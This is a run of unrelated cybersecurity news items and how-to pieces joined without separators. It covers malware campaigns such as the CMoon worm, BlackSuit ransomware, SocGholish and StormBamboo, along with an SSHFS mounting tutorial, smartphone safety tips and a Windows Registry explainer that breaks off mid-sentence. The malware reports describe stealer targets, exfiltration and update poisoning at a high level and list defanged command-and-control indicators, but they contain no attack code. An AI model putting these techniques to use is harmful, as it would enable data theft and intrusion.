CMoon also looks for interesting files stored on the USB drives and temporarily stores them in hidden directories (‘.intelligence’ and ‘.usb’) before these are exfiltrated to the attacker’s server.
CMoon features standard info-stealer functionality, targeting cryptocurrency wallets, data stored in web browsers, messenger apps, FTP and SSH clients, and document files in the USB or user folders that contain the text strings ‘secret,’ ‘service,’ or ‘password.’
An interesting and somewhat unusual feature is the targeting of files that might contain account credentials such as .pfx, .p12, .kdb, .kdbx, .lastpass, .psafe3, .pem, .key, .private, .asc, .gpg, .ovpn, and .log files.
Targeted directories and data Source: Kaspersky
The malware can also download and execute additional payloads, capture screenshots of the breached device, and initiate DDoS attacks on specified targets.
Stolen files and system information are packaged and sent to an external server, where they are decrypted (RC4) and verified for their integrity using an MD5 hash.
Generating the data package for exfiltration Source: Kaspersky
Kaspersky leaves open the possibility of more sites outside its current visibility distributing CMoon, so vigilance is advised.
No matter how targeted this campaign may be, the fact that the worm spreads autonomously means it could reach unintended systems and create the conditions for opportunistic attacks.
CISA and the FBI confirmed today that the Royal ransomware rebranded to BlackSuit and has demanded over $500 million from victims since it emerged more than two years ago.
This new information was shared as an update to a joint advisory published in March 2023, which says the BlackSuit gang has been active since September 2022.
However, this private group is believed to be a direct successor of the notorious Conti cybercrime syndicate and started as Quantum ransomware in January 2022.
While they initially used other gangs’ encryptors (like ALPHV/BlackCat), likely to avoid drawing unwanted attention, they deployed their own Zeon encryptor soon after and rebranded to Royal in September 2022.
After attacking the City of Dallas, Texas, in June 2023, the Royal ransomware operation began testing a new encryptor called BlackSuit amid rebranding rumors. Since then, they have been operating under the BlackSuit name, and Royal Ransomware attacks have stopped altogether.
“BlackSuit ransomware is the evolution of the ransomware previously identified as Royal ransomware, which was used from approximately September 2022 through June 2023. BlackSuit shares numerous coding similarities with Royal ransomware and has exhibited improved capabilities,” the FBI and CISA confirmed in a Wednesday update to their original advisory.
“Ransom demands have typically ranged from approximately $1 million to $10 million USD, with payment demanded in Bitcoin. BlackSuit actors have demanded over $500 million USD in total and the largest individual ransom demand was $60 million.”
In March 2023 and a subsequent November 2023 advisory update, the two agencies shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) to help defenders block the gang’s attempts to deploy ransomware on their networks.
CISA and the FBI also linked the BlackSuit gang to attacks against over 350 organizations since September 2022 and at least $275 million in ransom demands.
The joint advisory was first issued after the Department of Health and Human Services (HHS) security team revealed in December 2022 that the ransomware operation was behind multiple attacks targeting healthcare organizations across the United States.
Most recently, multiple sources told BleepingComputer that the BlackSuit ransomware gang was behind a massive CDK Global IT outage that disrupted operations at over 15,000 car dealerships across North America.
This widespread outage after last month’s attack forced CDK to shut down its IT systems and data centers to contain the incident and car dealerships to switch to pen and paper, making it impossible for buyers to purchase cars or receive service for already-bought vehicles.
On Tuesday, IT and phone systems at McLaren Health Care hospitals were disrupted following an attack linked to the INC Ransom ransomware operation.
McLaren is a non-profit healthcare system with annual revenues of over $6.5 billion, which operates a network of 13 hospitals across Michigan supported by a team of 640 physicians. It also has over 28,000 employees and works with 113,000 network providers throughout Michigan, Indiana, and Ohio.
“While McLaren Health Care continues to investigate a disruption to our information technology system, we want to ensure our teams are as prepared as possible to care for patients when they arrive,” a statement on the health system’s website reads.
“Patients with scheduled appointments should plan to attend those appointments unless they are contacted by a member of our care team.
McLaren hinted the hospitals had lost access to patient information databases when advising patients to bring detailed information about their current medications to appointments, including physician orders and printed results of recent lab tests. The health system also said it may have to reschedule some appointments and non-emergent or elective procedures “out of an abundance of caution.”
“We understand this situation may be frustrating to our patients – and to our team members – and we deeply and sincerely apologize for any inconvenience this may cause,” McLaren added. “We kindly ask for your patience while our caregivers and support teams work as diligently as ever to provide our communities the care they need and deserve.”
Even though McLaren has yet to disclose the nature of the incident, employees at McLaren Bay Region Hospital in Bay City have shared a ransom note warning that the hospital’s systems have been encrypted and stolen data will be published on INC RANSOM ransomware gang’s leak site if a ransom is not paid.
INC Ransom is a ransomware-as-a-service (RaaS) operation that surfaced in July 2023 and has since targeted organizations in both the public and private sectors.
In May, a threat actor known as “salfetka” claimed to be selling source code of INC Ransom’s Windows and Linux/ESXi encrypter versions for $300,000 on the Exploit and XSS hacking forums.
Two months later, in July, malware analysts stated that the source code might have been purchased by a newly emerged ransomware group called Lynx ransomware. However, this could also be a rebranding effort, potentially allowing INC RANSOM to continue operations with less scrutiny from law enforcement.
BleepingComputer did an analysis of strings between the new Lynx ransomware encryptors and recent INC encryptors, and other than small changes, can confirm they are mostly the same.
INC vs. Lynx ransomware string comparison (BleepingComputer)
In November 2023, McLaren notified almost 2.2 million people of a data breach that exposed their personal and health information between late July and August 2023.
Compromised data included names, Social Security numbers, health insurance and physician information, as well as Medicare/Medicaid, prescription/medication, and diagnostic results and treatment information.
The ALPHV/BlackCat ransomware group claimed the July 2023 attack behind the data breach on October 4.
SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.
Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS score of 7.6 and one scoring 8.3.
The most severe of the flaws are listed below –
CVE-2024-23472 – SolarWinds ARM Directory Traversal Arbitrary File Deletion and Information Disclosure Vulnerability
CVE-2024-28074 – SolarWinds ARM Internal Deserialization Remote Code Execution Vulnerability
Successful exploitation of the aforementioned vulnerabilities could allow an attacker to read and delete files and execute code with elevated privileges.
The shortcomings have been addressed in version 2024.3 released on July 17, 2024, following responsible disclosure as part of the Trend Micro Zero Day Initiative (ZDI).
The development comes after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) placed a high-severity path traversal flaw in SolarWinds Serv-U Path (CVE-2024-28995, CVSS score: 8.6) to its Known Exploited Vulnerabilities (KEV) catalog following reports of active exploitation in the wild.
The network security company was the victim of a major supply chain attack in 2020 after the update mechanism associated with its Orion network management platform was compromised by Russian APT29 hackers to distribute malicious code to downstream customers as part of a high-profile cyber espionage campaign.
The breach prompted the U.S. Securities and Exchange Commission (SEC) to file a lawsuit against SolarWinds and its chief information security officer (CISO) last October alleging the company failed to disclose adequate material information to investors regarding cybersecurity risks.
However, much of the claims pertaining to the lawsuit were thrown out by the U.S. District Court for the Southern District of New York (SDNY) on July 18, stating “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.”
The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC.
BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source “volunteer computing” platform maintained by the University of California with an aim to carry out “large-scale distributed high-throughput computing” using participating home computers on which the app is installed.
“It’s similar to a cryptocurrency miner in that way (using computer resources to do work), and it’s actually designed to reward users with a specific type of cryptocurrency called Gridcoin, designed for this purpose,” Huntress researchers Matt Anderson, Alden Schmidt, and Greg Linares said in a report published last week.
These malicious installations are designed to connect to an actor-controlled domain (“rosettahome[.]cn” or “rosettahome[.]top”), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. As of July 15, 10,032 clients are connected to the two domains.
The cybersecurity firm said while it hasn’t observed any follow-on activity or tasks being executed by the infected hosts, it hypothesized that the “host connections could be sold off as initial access vectors to be used by other actors and potentially used to execute ransomware.”
SocGholish attack sequences typically begin when users land on compromised websites, where they are prompted to download a fake browser update that, upon execution, triggers the retrieval of additional payloads to the infiltrated machines.
The JavaScript downloader, in this case, activates two disjointed chains, one that leads to the deployment of a fileless variant of AsyncRAT and the other resulting in the BOINC installation.
The BOINC app, which is renamed as “SecurityHealthService.exe” or “trustedinstaller.exe” to evade detection, sets up persistence using a scheduled task by means of a PowerShell script.
The misuse of BOINC for malicious purposes hasn’t gone unnoticed by the project maintainers, who are currently investigating the problem and finding a way to “defeat this malware.” Evidence of the abuse dates back to at least June 26, 2024.
“The motivation and intent of the threat actor by loading this software onto infected hosts isn’t clear at this point,” the researchers said.
“Infected clients actively connecting to malicious BOINC servers present a fairly high risk, as there’s potential for a motivated threat actor to misuse this connection and execute any number of malicious commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain.”
The development comes as Check Point said it’s been tracking the use of compiled V8 JavaScript by malware authors to sidestep static detections and conceal remote access trojans, stealers, loaders, cryptocurrency miners, wipers, and ransomware.
“In the ongoing battle between security experts and threat actors, malware developers keep coming up with new tricks to hide their attacks,” security researcher Moshe Marelus said. “It’s not surprising that they’ve started using V8, as this technology is commonly used to create software as it is very widespread and extremely hard to analyze.”
Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools.
The campaign is a sign that the group “also engages in internal espionage,” Symantec’s Threat Hunter Team, part of Broadcom, said in a new report published today. “In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware.”
Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It’s known to be operational since 2012.
“Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption,” the company noted.
The latest set of attacks are characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google’s Threat Analysis Group (TAG) in November 2021 as distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.
The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.
“The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well,” SentinelOne noted in a subsequent analysis at the time.
MACMA’s connections to Daggerly also stem from source code overlaps between the malware and Mgbot, and the fact that it connects to a command-and-control (C2) server (103.243.212[.]98) that has also been used by a MgBot dropper.
Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.
“The group can create versions of its tools targeting most major operating system platform,” Symantec said, adding it has “seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS.”
The development comes as China’s National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.
“Although its main targets are U.S. congress and American people, it also attempt[s] to defame China, sow discords [sic] between China and other countries, contain China’s development, and rob Chinese companies,” the CVERC asserted in a recent report.
The Secure Shell (SSH) isn’t just about allowing you to remote into servers to tackle admin tasks. Thanks to this secure networking protocol, you can also mount remote directories with the help of the SSH File System (SSHF).
SSHFS uses SFTP (SSH File Transfer Protocol) to mount remote directories to a local machine using secure encryption, which means the connection is far more secure than your standard FTP. As well, once a remote directory is mounted, it can be used as if it was on the local machine.
Consider SSHFS to be a more secure way of creating network shares, the only difference is you have to have SSHFS installed on any machine that needs to connect to the share (whereas with Samba, you only have to have it installed on the machine hosting the share).
Let’s walk through the process of getting SSHFS up and running, so you can securely mount remote directories to your local machine.
What You’ll Need
To make this work, you’ll need at least two Linux machines. These machines can be Ubuntu or Fedora-based, because SSHFS is found in the standard repositories for most Linux distributions. You’ll also need a user with sudo privileges.
Installing SSHFS
Since SSHFS is found in the standard repositories, the installation is quite simple. Log into the server (which will house the directory to share) and install SSHFS with one of the following commands:
openSUSE-based distributions – sudo zypper -n in sshfs
Next, log into your local machine and install the package as well.
Once installed, you’ll need to set user_allow_other in the SSHFS config file on the local machine. For that, open the file with:
1
sudo nano /etc/fuse.conf
In that file, locate the line:
1
#user_allow_other
Change that to:
1
user_allow_other
Save and close the file.
Creating a Directory for Mounting
Back on the server, we must create a directory that will be mounted on the client machines. We’ll place our new directory in /srv with the command:
1
sudo mkdir /srv/data
With the new directory created, we need to give it ownership, such that either a user or group can access it. If you only have one user who needs to access it, you can change the ownership with the command:
1
sudo chown -R USERNAME:USERNAME /srv/data
If you want to allow more than one user to access the directory, you’d need to first create a group with the command:
1
sudo groupadd GROUP
Where GROUP is the name of the new group.
Next, add the necessary users to the group (one at a time) with the command:
1
sudo usermod -aG GROUP USERNAME
Where GROUP is the name of the group and USERNAME is the name of the user to be added.
You would then need to change the ownership of the new directory to the new group with:
1
sudo chown -R USERNAME:GROUP /srv/data
On the local machine, you’ll have to create a directory that will house the mounted remote directory. We’ll create this in a user’s home directory with:
1
mkdir ~/data_mount
Mount the Directory
It’s now time to mount our remote directory. Remember, we’re mounting the remote directory /srv/data to the local directory ~/data_mount. This is done with the command:
1
sshfs USER@SERVER:/srv/data ~/data_mount
Where USER is the remote username and SERVER is the IP address of the remote server. You’ll be prompted for the remote user’s password. On successful authentication, the remote directory will be mounted to the local directory and you can access it as if it were native to the local machine. If you save or edit a file in ~/data_mount, it will be reflected in /srv/data on the remote machine.
This method of mounting is temporary. Let’s make it permanent.
Permanently Mount the Remote Drive
To permanently mount the SSHFS drive, you have to jump through a few hoops before it’ll work. First, you must create an SSH key pair (on the local machine) with the command:
1
ssh-keygen -t rsa
Make sure to give the key a strong/unique password.
Once the key is generated, copy it to the server with the command:
1
ssh-copy-id USER@SERVER
Where USER is the remote user name and SERVER is the IP address of the remote server.
Let’s test the connection to ensure it’s working properly. From the local machine, SSH to the server with:
1
ssh USER@SERVER
Where USER is the remote username and SERVER is the IP address of the remote server. You should be prompted for the SSH key password and not your user password. Once you’ve successfully authenticated, exit from the connection with the exit command.
To make this mount permanent, you need to modify the /etc/fstab file on the local machine. Open that file for editing with:
1
sudo nano /etc/fstab
At the bottom of the file, paste the following line:
Where USER1 is the remote username, SERVER is the IP address of the server, USER2 is the username on the local machine, and USER_ID and GROUP_ID are unique to the local machine. You can locate the IDs with the command:
1
id
You should see entries like this:
1
uid=1000(jack) gid=1000(jack)
In the above example, the user ID is 1000 and the group ID is also 1000.
Save the file and test the mount with:
1
mount -a
If you receive no errors, all is well.
There is one caveat to this. During the boot process, the mount will fail because it will be attempted before networking is brought up. Because of this, after a reboot on the local machine, you’ll have to open a terminal window and mount the SSHFS directory with the command:
1
mount -a
Once you’ve done that, you’re ready to use the remote directory as if it were local.
Are smartphones less secure than PCs? The answer to that is, they’re different. They face different security threats. Yet they certainly share one thing in common — they both need protection.
So, what makes a smartphone unique when it comes to security? And how do you go about protecting it? We’ll cover both here.
Apps, spam texts, and other smartphone vulnerabilities
Several facts of life about smartphones set them apart when it comes to keeping your devices safer. A quick rundown looks like this:
First off, people keep lots of apps on their phones. Old ones, new ones, ones they practically forgot they had. The security issue that comes into play there is that any app on a phone is subject to vulnerabilities.
A vulnerability in just one of the dozens of apps on a phone can lead to problems. The adage of “the weakest link” applies here. The phone is only as secure as its least secure app. And that goes for the phone’s operating system as well.
Additionally, app permissions can also introduce risks. Apps often request access to different parts of your phone to work — such as when a messenger app asks for access to contacts and photos. In the case of malicious apps, they’ll ask for far more permissions than they need. A classic example involves the old “flashlight apps” that invasively asked for a wide swath of permissions. That gave the hackers all kinds of info on users, including things like location info. Today, the practice of malicious, permission-thirsty apps continues with wallpaper apps, utility apps, games, and more.
As for other malicious apps, sometimes people download them without knowing. This often happens when shopping in third-party app stores, yet it can happen in legit app stores as well — despite rigorous review processes from Apple and Google. Sometimes, hackers sneak them through the review process for approval. These apps might include spyware, ransomware, and other forms of malware.
Many people put their smartphones to personal and professional use.[i] That might mean the phone has access to corporate apps, networks, and data. If the phone gets compromised, those corporate assets might get compromised too. And it can work in the other direction. A corporate compromise might affect an employee’s smartphone.
More and more, our phones are our wallets. Digital wallets and payment apps have certainly gained popularity. They speed up checkout and make splitting meals with friends easy. That makes the prospect of a lost or stolen phone all the more serious. An unsecured phone in the hands of another is like forking over your wallet.
Lastly, spam texts. Unique to phones are the sketchy links that crop up in texting and messaging apps. These often lead to scam sites and other sites that spread malware.
With a good sense of what makes securing your smartphone unique, let’s look at several steps you can take to protect it.
How to protect your smartphone
Update your phone’s apps and operating system
Keeping your phone’s apps and operating system up to date can greatly improve your security. Updates can fix vulnerabilities that hackers rely on to pull off their malware-based attacks. it’s another tried and true method of keeping yourself safer — and for keeping your phone running great too.
Lock your phone
With all that you keep and conduct on your phone, a lock is a must. Whether you have a PIN, passcode, or facial recognition available, put it into play. The same goes for things like your payment, banking, and financial apps. Ensure you have them locked too.
Avoid third-party app stores
As mentioned above, app stores have measures in place to review and vet apps that help ensure they’re safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, legitimate app stores are quick to remove malicious apps from their stores once discovered, making shopping there safer still.
Review apps carefully
Check out the developer — have they published several other apps with many downloads and good reviews? A legit app typically has many reviews. In contrast, malicious apps might have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it.
Go with a strong recommendation.
Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download.
Keep an eye on app permissions
Another way hackers weasel their way into your device is by getting permissions to access things like your location, contacts, and photos — and they’ll use malicious apps to do it. If an app asks for way more than you bargained for, like a simple puzzle game that asks for access to your camera or microphone, it might be a scam. Delete the app.
Learn how to remotely lock or erase your smartphone
So what happens if your phone ends up getting lost or stolen? A combination of device tracking, device locking, and remote erasing can help protect your phone and the data on it. Different device manufacturers have different ways of going about it, but the result is the same — you can prevent others from using your phone. You can even erase it if you’re truly worried that it’s gone for good. Apple provides iOS users with a step-by-step guide, and Google offers a guide for Android users as well.
Microsoft’s response to a distributed denial-of-service (DDoS) attack appears to have caused Azure service outages that impacted many customers.
Microsoft explained on its Azure status page that a “subset of customers” experienced issues connecting to services such as Azure App Services, Application Insights, Azure IoT Central, Azure Log Search Alerts, and Azure Policy, as well as the Azure portal and some Microsoft 365 and Purview services.
According to the BBC, the outage, which lasted roughly 10 hours, impacted water utilities, courts, banks, and other types of organizations.
Microsoft said it initially saw an unexpected usage spike that resulted in Azure Front Door and Azure Content Delivery Network components “performing below acceptable thresholds”, which led to errors, timeouts and latency issues.
An investigation showed that a DDoS attack launched against its systems triggered protection mechanisms, but an implementation bug in those defenses caused the attack’s impact to be amplified rather than mitigated.
The tech giant has promised to publish a preliminary incident review within 72 hours and a more detailed review within two weeks.
It’s unclear who is behind the DDoS attack on Microsoft services, but it would not be surprising if multiple hacktivist groups take credit for it in an effort to boost their reputation.
The incident comes just days after millions of computers worldwide were disrupted by a bad update rolled out by cybersecurity firm CrowdStrike.
A vast majority of devices impacted by the CrowdStrike incident were restored within one week, but insurers predict billions in losses for the security firm’s major customers. CrowdStrike is also facing lawsuits over the incident.
DigiCert has started revoking thousands of certificates impacted by a recently discovered verification issue, but some customers in critical infrastructure and other sectors are asking for more time.
The certificate authority (CA) informed customers on July 29 of an incident related to domain validation, saying that it needs to revoke some certificates within 24 hours due to strict CA/Browser Forum (CABF) rules.
The company initially said roughly 0.4% of applicable domain validations were impacted. A DigiCert representative clarified in discussions with stakeholders that 83,267 certificates and 6,807 subscribers are affected.
DigiCert said some of the impacted customers were able to quickly reissue their certificates, but others would not be able to do so within the 24-hour time frame.
“Unfortunately, many other customers operating critical infrastructure, vital telecommunications networks, cloud services, and healthcare industries are not in a position to be revoked without critical service interruptions. While we have deployed automation with several willing customers, the reality is that many large organizations cannot reissue and deploy new certificates everywhere in time,” said Jeremy Rowley, CISO at DigiCert.
DigiCert said in an updated notification that it has been working with browser representatives and customers in an effort to delay revocations under exceptional circumstances in order to avoid disruption to critical services.
However, the company highlighted that “all certificates impacted by this incident, regardless of circumstances, will be revoked no later than Saturday, August 3rd 2024, 19:30 UTC.”
Rowley noted that some customers have initiated legal action against DigiCert in an attempt to block the revocation of certificates.
The certificates are being revoked due to an issue related to the process used by DigiCert to validate that a customer requesting a TLS certificate for a domain is actually the owner or administrator of that domain.
One option is for customers to add a DNS CNAME record with a random value provided by DigiCert to their domain. The random value provided by DigiCert is prefixed by an underscore character to prevent collisions between the value and the domain name. However, the underscore prefix was not added in some cases since 2019.
In order to comply with CABF rules, DigiCert has to revoke certificates with an issue in their domain validation within 24, without exception.
Andrew Ayer, founder of SSLMate and an expert in digital certificates, believes that DigiCert’s public notification about this incident “gets the security impact of the noncompliance completely wrong”.
“[…] this is truly a security-critical incident, as there is a real risk […] that this flaw could have been exploited to get unauthorized certificates. Revocation of the improperly validated certificates is security-critical,” Ayer said.
The European Union’s world-first artificial intelligence law formally took effect on Thursday, marking the latest milestone in the bloc’s efforts to regulate the technology.
Officials say the Artificial Intelligence Act will protect the “fundamental rights” of citizens in the 27-nation bloc while also encouraging investment and innovation in the booming AI industry.
Years in the making, the AI Act is a comprehensive rulebook for governing AI in Europe, but it could also act as a guidepost for other governments still scrambling to draw up guardrails for the rapidly advancing technology.
The AI Act covers any product or service offered in the EU that uses artificial intelligence, whether it’s a platform from a Silicon Valley tech giant or a local startup. The restrictions are based on four levels of risk, and the vast majority of AI systems are expected to fall under the low-risk category, such as content recommendation systems or spam filters.
“The European approach to technology puts people first and ensures that everyone’s rights are preserved,” European Commission Executive Vice President Margrethe Vestager said. “With the AI Act, the EU has taken an important step to ensure that AI technology uptake respects EU rules in Europe.”
The provisions will come into force in stages, and Thursday’s implementation date starts the countdown for when they’ll kick in over the next few years.
AI systems that pose “unacceptable risk,” such as social scoring systems that influence how people behave, some types of predictive policing and emotion recognition systems in schools and workplaces, will face a blanket ban by February.
Rules covering so-called general-purpose AI models like OpenAI’s GPT-4 system will take force by August 2025.
Brussels is setting up a new AI Office that will act as the bloc’s enforcer for the general purpose AI rules.
OpenAI said in a blog post that it’s “committed to complying with the EU AI Act and we will be working closely with the new EU AI Office as the law is implemented.”
By mid-2026, the complete set of regulations, including restrictions on high-risk AI such as systems that decide who gets a loan or that operate autonomous robots, will be in force.
There’s also a fourth category for AI systems that pose a limited risk, and face transparency obligations. Chatbots must be informed that they’re interacting with a machine and AI-generated content like deepfakes will need to be labelled.
Companies that don’t comply with the rules face fines worth as much as 7% of their annual global revenue.
Privacy-focused search engine DuckDuckGo has been blocked in Indonesia by its government after citizens reportedly complained about pornographic and online gambling content in its search results.
The government’s choice to block DuckDuckGo isn’t surprising considering the cultural and religious context, with Indonesia being a Muslim country where gambling is prohibited and porn is viewed as morally unacceptable.
The government has previously blocked numerous pornography sites, Reddit, and Vimeo, and imposed temporary or partial restrictions on Tumblr, Telegram, TikTok, Netflix, and Badoo.
DuckDuckGo has now confirmed to BleepingComputer that Indonesia blocked its search engine in the country and that it has no means to respond to it.
“We can confirm that DuckDuckGo has been blocked in Indonesia due to their censorship policies. Unfortunately, there is no current path to being unblocked, similar to how we’ve been blocked in China for about a decade now,” DuckDuckGo told BleepingComputer.
At the same time, Google Search remains accessible in Indonesia, which suggests that either the tech giant has implemented effective self-censorship mechanisms for its local search engine or its size makes blocking too disruptive for internet usage in the country.
Indonesians have resorted to using VPN software to bypass the government’s restrictions. However, the Indonesian government plans to block free VPNs, making gaining access to blocked sites costly.
Free VPNs next
Virtual Private Network (VPN) tools are commonly used to bypass censorship imposed by governments and internet service providers.
When using VPNs, users can make connections from other countries to once again access DuckDuckGo, but free offerings may soon be removed.
Minister of Communication and Information Budi Arie Setiadi stated that the government intends to restrict access to free VPN tools, as they know these are used to access blocked online gambling portals.
“Yesterday, Mr. Hokky (Ministry’s Director General of Informatics Applications) had a meeting with Mr. Wayan (Ministry’s Director General of Postal and Information Technology Operations), and we will shut down free VPNs to reduce access to networks for the general public to curb the spread of online gambling,” stated Setiadi on June 31, 2024.
“I specifically have to include the issue of online gambling to make it clear that this is the darkest side of digitalization.”
The same ministry announcement highlighted the risks of free VPN services, underlining personal data theft, malware infections, and making internet connectivity slow or unreliable.
A Facebook malvertising campaign targets users searching for AI image editing tools and steals their credentials by tricking them into installing fake apps that mimic legitimate software.
The attackers exploit the popularity of AI-driven image-generation tools by creating malicious websites that closely resemble legitimate services and trick potential victims into infecting themselves with information stealer malware, as Trend Micro researchers who analyzed the campaign found.
The attacks start with phishing messages sent to Facebook page owners or administrators, which will send them to fake account protection pages designed to trick them into providing their login information.
After stealing their credentials, the threat actors hijack their accounts, take control of their pages, publish malicious social media posts, and promote them via paid advertising.
“We discovered a malvertising campaign involving a threat actor that steals social media pages (typically related to photography), changing their names to make them seem connected to popular AI photo editors,” said Trend Micro threat researcher Jaromir Horejsi.
“The threat actor then creates malicious posts with links to fake websites made to resemble the actual website of the legitimate photo editor. To increase traffic, the perpetrator then boosts the malicious posts via paid ads.”
Fake AI photo editor website (Trend Micro)
Facebook users who click the URL promoted in the malicious ad are sent to a fake web page impersonating legitimate AI photo editing and generating software, where they are prompted to download and install a software package.
However, instead of AI image editing software, the victims install the legitimate ITarian remote desktop tool configured to launch a downloader that automatically deploys the Lumma Stealer malware.
The malware then quietly infiltrates their system, allowing the attackers to collect and exfiltrate sensitive information like credentials, cryptocurrency wallet files, browser data, and password manager databases.
This data is later sold to other cybercriminals or used by the attackers to compromise the victims’ online accounts, steal their money, and promote further scams.
Attack flow (Trend Micro)
“Users should enable multi-factor authentication (MFA) on all social media accounts to add an extra layer of protection against unauthorized access,” Horejsi advised.
“Organizations should educate their employees on the dangers of phishing attacks and how to recognize suspicious messages and links. Users should always verify the legitimacy of links, especially those asking for personal information or login credentials.”
In April, a similar Facebook malvertising campaign promoted a malicious page impersonating Midjourney to target almost 1.2 million users with the Rilide Stealer Chrome browser extension.
A recent Google Chrome update has broken the drag-and-drop feature in the Downloads bubble that previously allowed you to drag and drop downloaded files onto any website or tab in the browser.
Google Chrome’s downloads menu originally appeared in a bar at the bottom of the browser, but this changed last year when it was replaced with a downloads bubble, which appears within the toolbar.
Google Chrome download bubble Source: BleepingComputer
As first reported by BleepingComputer, hundreds of users are now saying that the drag-and-drop feature no longer works after recent Google Chrome updates.
“Specifically files can’t be dragged into another chrome window, or be used to open a new chrome window (opening the file with chrome),” reads a post in the Google support forums.
“Dragging onto local desktop or into other programs seems to work fine. The downloads page, also works fine. Only the downloads bubble. I was able to recreate the issue by updating chrome, my current version is: 127.0.6533.73 (Official Build) (64-bit).”
In a Chromium issue found by BleepingComputer, Google Chrome engineers say reports about this bug began on July 29th and affect versions 127.0.6533.73 and 126.0.6478.185.
Google determined it was caused by a new performance-enhancing feature, ‘UIPumpImprovementsWin,’ which was rolled out to 50% of the Chrome Stable users on Sunday night.
A fix has been created by rolling back the UIPumpImprovementsWin change, which should be rolled out to users soon.
A Chinese hacking group tracked as StormBamboo has compromised an undisclosed internet service provider (ISP) to poison automatic software updates with malware.
Also tracked as Evasive Panda, Daggerfly, and StormCloud, this cyber-espionage group has been active since at least 2012, targeting organizations across mainland China, Hong Kong, Macao, Nigeria, and various Southeast and East Asian countries.
On Friday, Volexity threat researchers revealed that the Chinese cyber-espionage gang had exploited insecure HTTP software update mechanisms that didn’t validate digital signatures to deploy malware payloads on victims’ Windows and macOS devices.
“When these applications went to retrieve their updates, instead of installing the intended update, they would install malware, including but not limited to MACMA and POCOSTICK (aka MGBot),” cybersecurity company Volexity explained in a report published on Friday.
To do that, the attackers intercepted and modified victims’ DNS requests and poisoned them with malicious IP addresses. This delivered the malware to the targets’ systems from StormBamboo’s command-and-control servers without requiring user interaction.
For instance, they took advantage of 5KPlayer requests to update the youtube-dl dependency to push a backdoored installer hosted on their C2 servers.
After compromising the target’s systems, the threat actors installed a malicious Google Chrome extension (ReloadText), which allowed them to harvest and steal browser cookies and mail data.
StormBamboo attack flow (Volexity)
“Volexity observed StormBamboo targeting multiple software vendors, who use insecure update workflows, using varying levels of complexity in their steps for pushing malware,” the researchers added.
“Volexity notified and worked with the ISP, who investigated various key devices providing traffic-routing services on their network. As the ISP rebooted and took various components of the network offline, the DNS poisoning immediately stopped.”
In April 2023, ESET threat researchers also observed the hacking group deploying the Pocostick (MGBot) Windows backdoor by abusing the automatic update mechanism for the Tencent QQ messaging application in attacks targeting international NGOs (non-governmental organizations).
Almost a year later, in July 2024, Symantec’s threat hunting team spotted the Chinese hackers targeting an American NGO in China and multiple organizations in Taiwan with new Macma macOS backdoor and Nightdoor Windows malware versions.
In both cases, although the attackers’ skill was evident, the researchers believed it was either a supply chain attack or an adversary-in-the-middle (AITM) attack but weren’t able to pin down the exact attack method.
The Registry Editor is a powerful application that allows you to access and edit the configuration settings of the Windows operating system.
The Windows Registry is a database containing various settings used by the operating system and installed software applications.
However, it is essential to be careful when using the Registry Editor, as making incorrect changes to the Registry can cause serious problems with your system, including preventing it from booting correctly.
The Windows Registry database stores the configuration options and settings for the Windows operating system and software installed on your computer.
The Registry is organized in a hierarchical structure containing keys and values, with five different ‘root’ keys at the top, as shown below, that serve a particular purpose.
The Windows Registry Editor showing the five root keys Source: BleepingComputer
The five different root keys in the Windows registry and their purposes are:
HKEY_CLASSES_ROOT (HKCR): This key stores information about file associations and OLE object classes.
HKEY_CURRENT_USER (HKCU): This key stores information about the current user’s settings and a specific user’s preferences for various applications.
HKEY_LOCAL_MACHINE (HKLM): This key stores information that affects the entire computer, regardless of the logged-in user. These settings are for the computer’s hardware, operating system configuration, and software settings that affect all users.
HKEY_USERS (HKU): This key stores information about all users who have logged on to the computer.
HKEY_CURRENT_CONFIG (HKCC): This key stores information about the current hardware configuration of the computer.
For the most part, you will be modifying keys and values under the HKCU and HKLM root keys.
Registry keys are like folders containing other keys and values used to organize and group related settings.
For example, the HKEY_CURRENT_USER key contains settings for the current user account, such as a user’s desktop wallpaper, installed application preferences, and personal settings.
While keys are like folders, Registry values are the files stored within them, containing the specific settings for a particular key. They can have different data types, including text, numbers, and binary data.
There are several different types of registry value data types:
